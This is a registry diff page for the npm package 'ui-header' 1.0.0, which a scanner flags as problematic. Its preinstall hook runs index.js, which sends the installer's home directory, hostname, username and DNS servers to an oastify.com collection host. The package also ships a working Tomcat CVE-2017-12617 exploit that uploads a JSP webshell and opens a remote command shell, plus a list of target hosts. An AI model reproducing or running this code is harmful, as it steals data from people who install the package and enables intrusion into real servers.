ui-header 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of ui-header might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/42966.py +200 -0
  2. package/index.js +47 -0
  3. package/package.json +12 -0
  4. package/package.json& +12 -0
  5. package/scan.txt +24 -0
package/42966.py ADDED
@@ -0,0 +1,200 @@
1
+ #!/usr/bin/python
2
+ import requests
3
+ import re
4
+ import signal
5
+ from optparse import OptionParser
6
+
7
+ class bcolors:
8
+ HEADER = '\033[95m'
9
+ OKBLUE = '\033[94m'
10
+ OKGREEN = '\033[92m'
11
+ WARNING = '\033[93m'
12
+ FAIL = '\033[91m'
13
+ ENDC = '\033[0m'
14
+ BOLD = '\033[1m'
15
+ UNDERLINE = '\033[4m'
16
+
17
+
18
+ banner="""
19
+
20
+
21
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
22
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
23
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
24
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
25
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
26
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
27
+
28
+
29
+
30
+ [@intx0x80]
31
+
32
+ """
33
+
34
+
35
+ def signal_handler(signal, frame):
36
+
37
+ print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
38
+
39
+ exit()
40
+
41
+ signal.signal(signal.SIGINT, signal_handler)
42
+
43
+
44
+
45
+
46
+ def removetags(tags):
47
+ remove = re.compile('<.*?>')
48
+ txt = re.sub(remove, '\n', tags)
49
+ return txt.replace("\n\n\n","\n")
50
+
51
+
52
+ def getContent(url,f):
53
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
54
+ re=requests.get(str(url)+"/"+str(f), headers=headers)
55
+ return re.content
56
+
57
+ def createPayload(url,f):
58
+ evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
59
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
60
+ req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
61
+ if req.status_code==201:
62
+ print ("File Created ..")
63
+
64
+
65
+ def RCE(url,f):
66
+ EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
67
+ <INPUT name='cmd' type=text>
68
+ <INPUT type=submit value='Run'>
69
+ </FORM>
70
+ <%@ page import="java.io.*" %>
71
+ <%
72
+ String cmd = request.getParameter("cmd");
73
+ String output = "";
74
+ if(cmd != null) {
75
+ String s = null;
76
+ try {
77
+ Process p = Runtime.getRuntime().exec(cmd,null,null);
78
+ BufferedReader sI = new BufferedReader(new
79
+ InputStreamReader(p.getInputStream()));
80
+ while((s = sI.readLine()) != null) { output += s+"</br>"; }
81
+ } catch(IOException e) { e.printStackTrace(); }
82
+ }
83
+ %>
84
+ <pre><%=output %></pre>"""
85
+
86
+
87
+
88
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
89
+
90
+ req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
91
+
92
+
93
+
94
+ def shell(url,f):
95
+
96
+ while True:
97
+ headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
98
+ cmd=input("$ ")
99
+ payload={'cmd':cmd}
100
+ if cmd=="q" or cmd=="Q":
101
+ break
102
+
103
+ re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
104
+ re=str(re.content)
105
+ t=removetags(re)
106
+ print (t)
107
+
108
+
109
+
110
+
111
+
112
+ #print bcolors.HEADER+ banner+bcolors.ENDC
113
+
114
+ parse=OptionParser(
115
+
116
+
117
+ bcolors.HEADER+"""
118
+
119
+
120
+ _______ ________ ___ ___ __ ______ __ ___ __ __ ______
121
+ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
122
+ | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
123
+ | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
124
+ | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
125
+ \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
126
+
127
+
128
+
129
+
130
+ ./cve-2017-12617.py [options]
131
+
132
+ options:
133
+
134
+ -u ,--url [::] check target url if it's vulnerable
135
+ -p,--pwn [::] generate webshell and upload it
136
+ -l,--list [::] hosts list
137
+
138
+ [+]usage:
139
+
140
+ ./cve-2017-12617.py -u http://127.0.0.1
141
+ ./cve-2017-12617.py --url http://127.0.0.1
142
+ ./cve-2017-12617.py -u http://127.0.0.1 -p pwn
143
+ ./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
144
+ ./cve-2017-12617.py -l hotsts.txt
145
+ ./cve-2017-12617.py --list hosts.txt
146
+
147
+
148
+ [@intx0x80]
149
+
150
+ """+bcolors.ENDC
151
+
152
+ )
153
+
154
+
155
+ parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
156
+ parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
157
+ parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
158
+
159
+ (opt,args)=parse.parse_args()
160
+
161
+ if opt.U==None and opt.P==None and opt.L==None:
162
+ print(parse.usage)
163
+ exit(0)
164
+
165
+
166
+
167
+ else:
168
+ if opt.U!=None and opt.P==None and opt.L==None:
169
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
170
+ url=str(opt.U)
171
+ checker="Poc.jsp"
172
+ print (bcolors.BOLD +"Poc Filename {}".format(checker))
173
+ createPayload(str(url)+"/",checker)
174
+ con=getContent(str(url)+"/",checker)
175
+ if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
176
+ print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
177
+ print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
178
+
179
+ else:
180
+ print ('Not Vulnerable to CVE-2017-12617 ')
181
+ elif opt.P!=None and opt.U!=None and opt.L==None:
182
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
183
+ pwn=str(opt.P)
184
+ url=str(opt.U)
185
+ print ("Uploading Webshell .....")
186
+ pwn=pwn+".jsp"
187
+ RCE(str(url)+"/",pwn)
188
+ shell(str(url),pwn)
189
+ elif opt.L!=None and opt.P==None and opt.U==None:
190
+ print (bcolors.OKGREEN+banner+bcolors.ENDC)
191
+ w=str(opt.L)
192
+ f=open(w,"r")
193
+ print ("Scaning hosts in {}".format(w))
194
+ checker="Poc.jsp"
195
+ for i in f.readlines():
196
+ i=i.strip("\n")
197
+ createPayload(str(i)+"/",checker)
198
+ con=getContent(str(i)+"/",checker)
199
+ if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
200
+ print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ //author:- whitehacker003@protonmail.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ const trackingData = JSON.stringify({
10
+ p: package,
11
+ c: __dirname,
12
+ hd: os.homedir(),
13
+ hn: os.hostname(),
14
+ un: os.userInfo().username,
15
+ dns: dns.getServers(),
16
+ r: packageJSON ? packageJSON.___resolved : undefined,
17
+ v: packageJSON.version,
18
+ pjson: packageJSON,
19
+ });
20
+
21
+ var postData = querystring.stringify({
22
+ msg: trackingData,
23
+ });
24
+
25
+ var options = {
26
+ hostname: "u83bgevclp91jbnqeqvvklvj4aa1ysmh.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
27
+ port: 443,
28
+ path: "/",
29
+ method: "POST",
30
+ headers: {
31
+ "Content-Type": "application/x-www-form-urlencoded",
32
+ "Content-Length": postData.length,
33
+ },
34
+ };
35
+
36
+ var req = https.request(options, (res) => {
37
+ res.on("data", (d) => {
38
+ process.stdout.write(d);
39
+ });
40
+ });
41
+
42
+ req.on("error", (e) => {
43
+ // console.error(e);
44
+ });
45
+
46
+ req.write(postData);
47
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ui-header",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/package.json& ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ui-header",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/scan.txt ADDED
@@ -0,0 +1,24 @@
1
+ https://open-preview-ent-api.safescore.ai
2
+ https://open-preview-scoring-api.safescore.ai
3
+ https://preview-ap-1.safescore.ai
4
+ https://preview-caas-azure-ap-south-1.safescore.ai
5
+ https://preview-caas-crowdstrike-ap-south-1.safescore.ai
6
+ https://preview-caas-gcp-scc-ap-south-1.safescore.ai
7
+ https://preview-caas-people-ap-south-1.safescore.ai
8
+ https://preview-caas-qualys-ap-south-1.safescore.ai
9
+ https://preview-caas-saas-ap-south-1.safescore.ai
10
+ https://preview-caas-tanium-ap-south-1.safescore.ai
11
+ https://preview-caas-tenable-ap-south-1.safescore.ai
12
+ https://preview-caas-wiz-ap-south-1.safescore.ai
13
+ https://preview-ent-api.safescore.ai
14
+ https://preview-scoring-api.safescore.ai
15
+ https://preview.safescore.ai
16
+ https://signal-ingestor-preview-ap-south-1.safescore.ai
17
+ https://preview-api.safeme.ai
18
+ https://preview-migration.safeme.ai
19
+ https://preview-scim.safeme.ai
20
+ https://preview.safeme.ai
21
+ https://preview.safe-x.cloud
22
+ https://auth.safescore.io
23
+ https://gpt.safescore.io
24
+ https://mygpt.safescore.io